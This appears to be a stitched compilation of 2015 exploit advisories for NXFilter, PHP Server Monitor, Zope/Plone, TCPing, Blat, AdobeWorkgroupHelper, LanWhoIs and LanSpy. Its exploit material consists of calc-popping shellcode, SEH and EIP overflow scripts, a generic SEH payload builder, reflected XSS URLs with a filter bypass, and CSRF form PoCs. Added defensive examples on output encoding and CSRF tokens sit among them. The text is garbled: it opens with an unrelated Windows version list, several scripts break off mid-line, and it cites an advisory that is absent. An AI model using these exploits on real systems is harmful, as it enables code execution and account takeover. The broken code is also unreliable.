Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Vista SP2
Microsoft Windows Vista x64 Edition SP2

by hyp3rlinx
NXFilter v3.0.3 CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt

Vendor: www.nxfilter.org/p2/

Product: NXFilter v3.0.3

Vulnerability Type: Cross site request forgery - CSRF

CVE Reference: N/A

Vulnerability Details:

No CSRF protections exist, allowing an attacker to make malicious HTTP requests on behalf of the victim. The server will process any of the following actions if the victim clicks an infected link or visits a malicious website while logged in to the vulnerable application:

1) add arbitrary users
2) add or change SMTP settings
3) add arbitrary redirect domains
4) add arbitrary zone transfers
5) delete zone transfer domains

Exploit code(s):

function doit(){
  var e=document.getElementById('HELL')
  e.submit()
}

1) CSRF add arbitrary users (and some persistent XSS via the same form)

http://localhost/user,user.jsp; method="post">

2) CSRF add or change SMTP notification alerts

http://localhost/config,alert.jsp; method="post">

3) CSRF add arbitrary redirect domain

http://localhost/config,redirection.jsp; method="post">

4) CSRF add arbitrary zone transfers

http://localhost/config,zone_transfer.jsp; method="post">

5) CSRF delete zone transfer domains (a plain GET request, so a link or image tag suffices)

http://localhost/config,zone_transfer.jsp?action_flag=delete=1

Disclosure Timeline:
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3

by hyp3rlinx
NXFilter v3.0.3 Persistent / Reflected XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt

Vendor: www.nxfilter.org/p2/

Product: NXFilter v3.0.3

Vulnerability Type: Persistent & Reflected XSS

CVE Reference: N/A

Vulnerability Details:

Persistent and reflected XSS entry points exist, allowing arbitrary client-side browser code execution against victims who click an infected link or view a page holding a persistently stored payload. Some XSS strings appear to be filtered, but the filter is a blacklist of known strings and can be defeated by building the same string at run time with JavaScript's String.fromCharCode(), as payload 3 below does for the text "HELL".

Exploit code(s):

1) Persistent XSS: under Category / Custom, the "name" parameter is vulnerable to persistent XSS injection using the POST method.

http://localhost/category,custom.jsp

2) Reflected XSS

http://localhost/classifier,ruleset.jsp?action_flag==1=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E

3) Reflected XSS

http://localhost/report,daily.jsp?stime=2015%2F10%2F17_option=yesterday=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E

Disclosure Timeline:
Vendor Notification: October 18, 2015
November 5, 2015 : Public Disclosure

Exploitation Technique: Remote

Severity Level: High

Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] NXFilter v3.0.3
Vulnerable Parameter(s): [+] name, user, kw

by hyp3rlinx
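The String.fromCharCode() bypass above works because a blacklist inspects what the input says, while the browser only cares where the input lands. The following is an added example, not NXFilter's code, that puts a keyword blacklist of the kind such filters use beside attribute-context output encoding, and checks both against the advisory's payload shapes (the script-tag payload and the onMouseMove payloads from the other advisories on this page). The blacklist contents, the `kw` input and the helper names are this example's assumptions; NXFilter's real filter is not known here.

```python
import html
import re
from html.parser import HTMLParser

# Added example (not NXFilter's code): a keyword blacklist of the kind the advisory's
# payloads slip past, beside output encoding that does not care what the payload says.
# The blacklist is assumed for illustration; NXFilter's actual filter is not known here.

BLACKLIST = re.compile(r"'|alert\(\s*['\"]|document\.cookie", re.IGNORECASE)

PAYLOAD_QUOTED = "\"/><script>alert('HELL')</script>"                              # caught
PAYLOAD_CHARCODE = '"/><script>alert(String.fromCharCode(72,69,76,76))</script>'  # same effect, passes
PAYLOAD_HANDLER = '" onMouseMove="alert(0)'                                        # attribute injection


def blacklist_filter(value):
    """Reject input matching a few known-bad strings; everything else passes untouched."""
    return "" if BLACKLIST.search(value) else value


def render_input_naive(value):
    """Reflect a parameter (here 'kw') into an attribute without encoding."""
    return '<input type="text" name="kw" value="%s"/>' % value


def render_input_safe(value):
    """Same, but HTML-encoded for an attribute context: " < > & ' become entities."""
    return '<input type="text" name="kw" value="%s"/>' % html.escape(value, quote=True)


class _Probe(HTMLParser):
    """Parse the rendered fragment the way a browser would and record what it sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

    handle_startendtag = handle_starttag


def injects_markup(rendered):
    """True if the reflected value produced anything beyond the single <input> we wrote:
    an extra element (the <script>) or an event-handler attribute."""
    probe = _Probe()
    probe.feed(rendered)
    probe.close()
    return probe.tags != ["input"] or bool(probe.handlers)


if __name__ == "__main__":
    for payload in (PAYLOAD_QUOTED, PAYLOAD_CHARCODE, PAYLOAD_HANDLER):
        passed = blacklist_filter(payload)
        print(repr(payload))
        print("  blacklist let it through:", passed != "")
        print("  naive render injects    :", injects_markup(render_input_naive(passed)))
        print("  encoded render injects  :", injects_markup(render_input_safe(payload)))
```

The encoded rendering is safe without any blacklist at all, which is the point: encode for the context the value lands in (attribute, element body, JavaScript string, URL) and drop the keyword list.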
TCPing 2.1.0 Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt

Vendor: Spetnik.com

Product: Spetnik TCPing 2.1.0 / tcping.exe, circa 2007

TCPing "pings" a server on a specific port using TCP/IP by opening and closing a connection on the specified port. Results are returned in a similar fashion to that of Microsoft Windows Ping. This application is intended for use in testing for open ports on remote machines, or as an alternative to the standard "ping" in a case where ICMP packets are blocked or ignored.

Vulnerability Type: Buffer Overflow

CVE Reference: N/A

Vulnerability Details:

If TCPing is called with a specially crafted command-line argument, we cause an exception and overwrite the pointer to the next SEH record and the SEH handler with our buffer and malicious shellcode. No suitable POP POP RET address is available inside TCPing itself: its addresses start with a null byte (0x00), which would terminate the argument string and break our shellcode. However, SafeSEH is a linker option applied per module and TCPing's own modules are not built with it, so we can take a POP POP RET address from another loaded module that is likewise not SafeSEH-protected and achieve arbitrary code execution on the victim's system.

Stack dump:

EAX 0045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 02CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AA
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 1 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr WSANO_DATA (2AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)

WinDBG dump:

(17a8.149c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for image0040
eax=0045 ebx=0222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
image0040+0x270a:
0040270a 8802    mov byte ptr [edx],al    ds:002b:41414141=??

The write to [EDX] with EDX=41414141 is what raises the exception that hands control to the overwritten SEH handler.

Exploit code(s):

Python script:

import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx
#pop calc.exe Windows 7 SP1

sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE
seh=struct.pack('
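Both the TCPing advisory above and the AccessDiver one earlier on this page overwrite the SEH chain: the four bytes at the "next SEH record" slot become a short JMP, the handler slot becomes a POP POP RET gadget, and the shellcode follows. The following is an added example, not either advisory's script, that builds that layout in Python and encodes the null-byte constraint the TCPing text describes. The NSEH offset, the gadget address 0x7C9037D8 and the INT3 bytes standing in for shellcode are placeholders of this example.

```python
import struct

# Added example (not the advisory's script): the layout of an SEH-based overflow
# string of the kind used against TCPing and AccessDiver. The offset and the
# POP POP RET address are placeholders; INT3 bytes stand in for shellcode.

# NSEH slot: JMP +6 hops over the 4-byte handler address that follows it and lands
# on the first byte after the SEH record, where the NOP sled and shellcode sit.
NSEH_JMP = b"\xEB\x06\x90\x90"


def seh_address_ok(addr):
    """A handler address is usable only if its little-endian bytes contain no NUL:
    a NUL ends the C string copy, so nothing after it (our shellcode) reaches the stack.
    That rules out tcping.exe's own 0x0040xxxx addresses, so the gadget has to come from
    another module, one that is not SafeSEH-protected."""
    return b"\x00" not in struct.pack("<I", addr)


def build_seh_payload(nseh_offset, ppr_addr, shellcode, nop_sled=8, total_len=None):
    """nseh_offset  filler bytes before the 'next SEH record' pointer
    ppr_addr     address of POP POP RET. When the handler is invoked, the address of
                 the SEH record (our NSEH bytes) is 8 bytes up the stack, so the two
                 POPs discard two DWORDs and the RET lands on NSEH_JMP.
    total_len    if given, pad so the string is exactly the length that triggers
                 the exception (e.g. 2073 or 2080 bytes for AccessDiver)."""
    if not seh_address_ok(ppr_addr):
        raise ValueError("POP POP RET address 0x%08x contains a NUL byte" % ppr_addr)
    payload = b"A" * nseh_offset + NSEH_JMP + struct.pack("<I", ppr_addr)
    payload += b"\x90" * nop_sled + shellcode
    if total_len is not None:
        if len(payload) > total_len:
            raise ValueError("payload longer than the buffer that triggers the exception")
        payload += b"D" * (total_len - len(payload))
    return payload


def seh_layout(payload, nseh_offset):
    """Split a payload back into its fields, to compare with what the debugger shows
    in the SEH chain view."""
    return {
        "nseh": payload[nseh_offset:nseh_offset + 4],
        "seh": struct.unpack("<I", payload[nseh_offset + 4:nseh_offset + 8])[0],
        "after": payload[nseh_offset + 8:],
    }


if __name__ == "__main__":
    print("0x0040270A usable as handler:", seh_address_ok(0x0040270A))  # False: NUL byte
    p = build_seh_payload(2000, 0x7C9037D8, b"\xcc" * 16, total_len=2080)
    fields = seh_layout(p, 2000)
    print("NSEH bytes:", fields["nseh"].hex(), "SEH: 0x%08x" % fields["seh"], "len:", len(p))
```

The module you take the gadget from must itself lack a SafeSEH table; the SafeSEH flag on tcping.exe says nothing about whether a handler inside ntdll or another DLL will be accepted.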
PHP Server Monitor 3.1.1 Privilege Escalation
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt

Vendor: www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download

Product: PHP Server Monitor 3.1.1

Vulnerability Type: Privilege Escalation / CSRF

Vulnerability Details:

PHP Server Monitor uses level 20 for a basic user and level 10 for Administrators; these levels are stored in the database. A basic user can elevate their privileges to Administrator by crafting an HTTP payload that changes their level to '10' and then getting an Administrator to click an infected link or visit a malicious website, launching a CSRF attack that saves the user with admin access. The problem is that no CSRF protection mechanism is in place, so the save is accepted as long as it arrives in the Administrator's authenticated session.

Exploit code(s):

1) privilege escalation / CSRF

function doit(){
  var e=document.getElementById('HELL')
  e.submit()
}

http://localhost/phpservermon-3.1.1/?=user=save=3; method="post">

Exploitation Technique: Remote

Disclosure Timeline:
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure

Severity Level: High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1

by hyp3rlinx
PHP Server Monitor 3.1.1 CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt

Vendor:
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download

Product:
PHP Server Monitor 3.1.1

Vulnerability Type:
===
Cross site request forgery (CSRF)

Vulnerability Details:
===
Multiple CSRF issues in PHP Server Monitor allow remote attackers to add arbitrary users & servers to the system, modify system configurations and delete arbitrary servers, if a user (admin) is logged in and visits our malicious website or clicks on our infected linxs. As no CSRF protection is used in the application, we can make requests on the victim's behalf and the server will happily oblige, processing our malicious HTTP requests.

Exploit code(s):
===
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

1) add arbitrary users to the system:
http://localhost/phpservermon-3.1.1/?=user=save=0; method="post">

2) add arbitrary servers to the system:
http://localhost/phpservermon-3.1.1/?=server=save=0_to=; method="post">

3) modify system configuration:
http://localhost/phpservermon-3.1.1/index.php?mod=config=save; method="post">

4) arbitrary server deletion via GET request:
http://localhost/sectest/phpservermon-3.1.1/?=server=delete=2

Exploitation Technique:
===
Remote

Severity Level:
===
High

Disclosure Timeline:
===
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure

Description:
===
Request Method(s): [+] GET / POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1

by hyp3rlinx
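Both PHP Server Monitor advisories above trace to the same missing control: a state-changing POST is accepted from any origin and the submitted 'level' field is trusted. The Python model below is an added example, not the project's code and not from the advisories; it shows a session-bound synchronizer token checked on every write plus a server-side rule that ignores a client-supplied level unless the actor is already an Administrator. The handler, session layout and user table are constructed for illustration; only the level values (10 = admin, 20 = basic user) come from the advisory.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Privilege levels as stated in the advisory: 10 = Administrator, 20 = basic user.
LEVEL_ADMIN = 10
LEVEL_USER = 20

# Per-deployment secret used to derive session-bound CSRF tokens (constructed here;
# a real deployment would load it from configuration, never from the request).
SERVER_SECRET = secrets.token_bytes(32)

# Constructed stand-in for the application's user table.
USERS: Dict[int, Dict] = {
    1: {"name": "admin", "level": LEVEL_ADMIN},
    3: {"name": "mallory", "level": LEVEL_USER},
}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to one session.

    The token is an HMAC of the session id, so the server can recompute it
    without storing it, and a token lifted from one session is useless in
    another. A page on a foreign origin cannot read it, which is exactly
    what a forged cross-site POST lacks.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted: Optional[str]) -> bool:
    # Constant-time comparison so the expected token does not leak byte by byte.
    expected = issue_csrf_token(session_id)
    return submitted is not None and hmac.compare_digest(expected, submitted)


def handle_user_save(session: Dict, form: Dict[str, str]) -> Tuple[int, str]:
    """Hardened model of a 'save user' POST handler.

    session: {"id": <session id>, "user_id": <acting user's id>}
    form:    POST fields, e.g. {"user_id": "3", "level": "10", "csrf_token": "..."}
    Returns an HTTP-style status and a short reason.
    """
    # 1. CSRF: every state-changing request must carry this session's token.
    if not csrf_token_valid(session["id"], form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"

    actor = USERS.get(session["user_id"])
    target_id = int(form.get("user_id", session["user_id"]))
    target = USERS.get(target_id)
    if actor is None or target is None:
        return 404, "unknown user"

    # 2. Authorization: basic users may only edit their own record ...
    if actor["level"] != LEVEL_ADMIN and target_id != session["user_id"]:
        return 403, "basic users may only edit their own account"

    # ... and may never change the level field, whatever the client submits.
    if "level" in form:
        new_level = int(form["level"])
        if actor["level"] != LEVEL_ADMIN and new_level != target["level"]:
            return 403, "only administrators may change a user's level"
        if new_level not in (LEVEL_ADMIN, LEVEL_USER):
            return 400, "unknown level"
        target["level"] = new_level

    if "name" in form:
        target["name"] = form["name"]
    return 200, "saved"


def demo() -> Dict:
    """Replays the advisory's escalation scenario against the hardened handler."""
    USERS[3]["level"] = LEVEL_USER  # reset so the demo is repeatable
    admin_session = {"id": "sess-admin-01", "user_id": 1}
    user_session = {"id": "sess-mallory-07", "user_id": 3}
    results = {}

    # Forged request from a malicious page: rides on the admin's cookies but
    # carries no token, because the attacker's origin cannot read it.
    results["forged"] = handle_user_save(admin_session, {"user_id": "3", "level": "10"})

    # Basic user attempting the escalation directly, with their own valid token.
    results["self_escalate"] = handle_user_save(
        user_session,
        {"user_id": "3", "level": "10", "csrf_token": issue_csrf_token(user_session["id"])},
    )

    # Legitimate promotion submitted from the real admin form, token included.
    results["admin_promote"] = handle_user_save(
        admin_session,
        {"user_id": "3", "level": "10", "csrf_token": issue_csrf_token(admin_session["id"])},
    )
    results["final_level"] = USERS[3]["level"]
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```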
Blat.exe v2.7.6 SMTP / NNTP Mailer Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt

Vendor:
www.blat.net
http://sourceforge.net/projects/blat/

Product:
Blat v2.7.6

blat.exe is a Win32 command line eMail tool that sends eMail using SMTP or posts to usenet using NNTP.

Vulnerability Type:
===
Stack Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
An older release, blat.exe v2.7.6, is prone to a stack based buffer overflow when passed malicious command line arguments. Two arguments must be sent: the first can be whatever, e.g. "", and the second triggers the buffer overflow and executes arbitrary code on the victim's OS.

Stack dump...

EAX 0826
ECX 0018E828 ASCII "Blat saw and processed these options, and was confused by the last one... AAA...
EDX 0008E3C8
EBX 00E1
ESP 0018F05C ASCII "A...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141 <-- BOOM!
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 1 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_SUCCESS ()
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)

Exploit code(s):
===

Python script to exploit...

import struct,os,subprocess

#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('
AdobeWorkgroupHelper Stack Based Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt

Vendor:
www.adobe.com

Product:
===
AdobeWorkgroupHelper.exe v2.8.3.3
Part of Photoshop 7.0 circa 2002

Vulnerability Type:
===
Stack Based Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow, resulting in arbitrary code execution and undermining the integrity of the program.

We control the EIP register at about 5,856 bytes; our shellcode will be pointed to by the ECX register.

Tested successfully on Windows 7 SP1

Exploit code(s):
===

Use below python script to exploit...

import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#
#by hyp3rlinx - apparition...@gmail.com
#hyp3rlinx.altervista.org
#==
#
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===

'''
Quick Register dump...
EAX 00270938
ECX 00270A7C <---BOOM!
EDX 00A515FC ASCII "AA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0 ES 002B 32bit 0()
P 0 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_SUCCESS ()
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
'''

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

#backslashes escaped so the path is a valid Windows path in a Python string literal
vulnpgm="C:\\Program Files (x86)\\Common Files\\Adobe\\Workflow\\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4 #< control EIP register
#our shellcode will point at ECX register, so we need to find a JMP or CALL ECX and point EIP to that address
#where our malicious code resides; we find it in ARM.dll
eip=struct.pack('
Zope Management Interface CSRF vulnerabilities
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt

Vendor:
www.zope.org
plone.org

Product:
Zope Management Interface 4.3.7

Zope is a Python-based application server for building secure and highly scalable web applications. Plone is a Content Management System built on top of the open source application server Zope and the accompanying Content Management Framework.

Vulnerability Type:
===
Cross site request forgery (CSRF)

Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope Management Interface).

Patches to Zope and Plone for multiple CSRF issues:
https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope
https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf

CVE Reference:
===
NA

Vulnerability Details:
===
Security vulnerability: 20151006 - CSRF
The ZMI is mostly unprotected from CSRF vulnerabilities.

Versions affected:
4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, 4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2, 4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, 4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6, 3.3.5, 3.3.4, 3.3.3, 3.3.2, 3.3.1, 3.3

All versions of Plone prior to 5.x are vulnerable.

Fixed by Nathan Van Gheem, of the Plone Security Team. Coordinated by the Plone Security Team; the patch was released and is available from https://pypi.python.org/pypi/plone4.csrffixes

Exploit code(s):
===
1) Plone CSRF Add Linxs & Persistent XSS

function doit(){
var e=document.getElementById('HELL')
e.submit()
}

http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.66/atct_edit;>
http://hyp3rlinx.altervista.org; size="30" maxlength="511" placeholder="" />

2) CSRF to Persistent XSS - Zope Management Interface
Persistent XSS via CSRF on the title change properties tab; this will execute on each Zope page accessed by users.

CSRF to Persistent XSS POC Code:
===
http://localhost:8080/; method="post">

Disclosure Timeline:
===
Vulnerability reported: 2015-08-30
Hotfix released: 2015-10-06

Exploitation Technique:
===
Remote

Vector: NETWORK
Complexity: LOW
Authentication: NONE
Confidentiality: NONE
Integrity: PARTIAL
Availability: PARTIAL

Severity Level:
===
6.4 MEDIUM

Description:
===
Request Method(s): [+] POST
Vulnerable Product: [+] Zope Management Interface & all versions of Plone prior to 5.x are vulnerable.

by hyp3rlinx
LanWhoIs.exe 1.0.1.120 Stack Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt

Vendor:
www.lantricks.com

Product:
LanWhoIs.exe 1.0.1.120

LanWhoIs queries and returns domain (site) holder or IP address information.

Vulnerability Type:
===
Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml XML file located under the LanWhoIs directory. This file holds results returned from program queries.

e.g.
216.239.37.99 whois.arin.net 02.01.2005 16:17:30 -1

We can exploit the program by injecting a malicious payload into the XML node of the local XML file (the QueryString parameter listed below), causing a buffer overflow that overwrites both pointers to the NSEH & SEH exception handlers and controls EIP at about 676 bytes.

e.g.
A.shellcode...etc..

WinDbg stack dump

(2048.17cc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for image0040
eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi= edi=
eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
image0040+0x4bc8:
00404bc8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139=

0:011> !exchain
02bdfed4: 52525252
Invalid exception stack at 42424242

registers...
EAX
ECX 52525252
EDX 7714B4AD ntdll.7714B4AD
EBX
ESP 04D0F668
EBP 04D0F688
ESI
EDI
EIP 52525252

POC code:
===
Run the below script, then copy and insert the POC payload into the XML node and run the application. Next, select the address in the Results window pane and then click the Query button to run a whois lookup, or use the 'F3' keyboard cmd to execute, and KABOOOM!!!

#backslashes escaped so the path is a valid Windows path in a Python string literal
file=open("C:\\Program Files (x86)\\LanTricks\\LanWhoIs\\HELL","w")
payload="A"*676+""+"" #<--KABOOM!!!
file.write(payload)
file.close()

Public Disclosure:
===
October 6, 2015

Exploitation Technique:
===
Local

Tested on Windows 7 SP1

Vulnerable Parameter:
===
QueryString

by hyp3rlinx
LanSpy 2.0.0.155 Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt

Vendor:
www.lantricks.com

Product:
LanSpy.exe

LanSpy is a network security and port scanner which retrieves different information about a computer: Domain and NetBIOS names, MAC address, server information, domain and domain controller etc.

Vulnerability Type:
===
Buffer Overflow

CVE Reference:
===
N/A

Vulnerability Details:
===
LanSpy.exe uses an 'addresses.txt' plain text file which lives under the main LanSpy directory; the file is used to load the IPs or URLs to scan, e.g. 127.0.0.1.

Replace the addresses.txt file with our malicious one; the buffer overflow payload must be the very first entry in the text file. Next, run LanSpy.exe and click the green arrow or press 'F3' to start. Then KABOOM!... the program crashes and we control EIP at 684 bytes, also overwriting both the NSEH & SEH exception handler pointers...

Quick stack dump...

(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx= esi= edi=
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
0:001> g
(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx=52525252 edx=7714b4ad esi= edi=
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
52525252 ?? ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242

POC code(s):
===

import os

#LanSpy.exe buffer overflow POC
#by hyp3rlinx
#hyp3rlinx.altervista.org
#=
#LanSpy.exe uses an 'addresses.txt' text file
#which lives under the LanSpy directory
#the addresses.txt file is used to load scanned IPs or URLs
#control EIP at 684 bytes... also overwrite
#both the NSEH & SEH exception handler pointers
#---

payload="A"*684+""+"" #<--- KABOOM!
file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
file.write(payload)
file.close()

Public Disclosure:
===
October 5, 2015

